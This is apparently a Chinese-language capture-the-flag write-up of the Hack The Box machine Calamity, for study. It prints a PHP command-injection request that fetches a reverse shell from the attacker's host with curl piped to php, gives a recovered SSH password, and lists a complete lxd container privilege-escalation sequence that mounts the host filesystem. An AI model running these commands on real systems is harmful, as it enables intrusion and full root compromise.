HTB-靶机-Calamity

本篇文章仅用于技术交流学习和研究的目的，严禁使用文章中的技术用于非法目的和破坏，否则造成一切后果与发表本文章的作者无关

靶机是作者购买VIP使用退役靶机操作，显示IP地址为10.10.10.27

本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描

执行命令

autorecon 10.10.10.27 -o ./calamity-autorecon

最终的扫描结果

得知开放两个端口，先访问80端口

没发现啥有价值的信息，看下上面程序跑的目录情况

发现200响应码 有最下面几个，访问了，确认admin.php看似是可以利用的

上面试了试admin/admin弱口令并未成功，然后看下burpsuite抓包情况

发现密码，使用此密码以用户admin进行登录

登录成功之后，显示上述信息，根据上述信息的提示可以是使用php进行命令执行，试了试还真可以

那么可以执行命令那么就反弹shell，这里开始使用nc，发现成功反弹之后又被踢出去了，后来拿到权限才知道是因为目标靶机有一个后台程序监听常用反弹shell的关键字导致，所以我这直接使用curl命令下载php反弹shell然后执行成功反弹，下面是反弹shell请求包

GET /admin.php?html=%3C%3Fphp+system%28('curl+http://10.10.14.4:8000/rev.php+|php')%29%3F%3E HTTP/1.1
Host: 10.10.10.27
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://10.10.10.27/admin.php
Cookie: adminpowa=noonecares
Connection: close

下载枚举脚本枚举可用的提权信息，没发现啥有价值的信息，看了下目标普通用户的家目录，发现如下信息

有些音频文件，将其传到本地kali使用工具导入合并多听几遍得出密码为18547936..* 对应登录ssh用户xalvas

成功登陆目标靶机用户xalvas，执行id命令发现含有lxd，可以通过lxd进行提权，相关参考：

https://reboare.github.io/lxd/lxd-escape.html

具体整个的提权命令如下：

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder/
sudo ./build-alpine -a i686
wget http://10.10.14.4:8000/alpine-v3.12-x86_64-20201103_0108.tar.gz
lxc image import alpine-v3.12-i686-20201110_2252.tar.gz --alias bmfx
lxc image list
lxc init bmfx privesc -c security.privileged=true
lxc list
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc --mode=interactive /bin/sh
cat /mnt/root/root/root.txt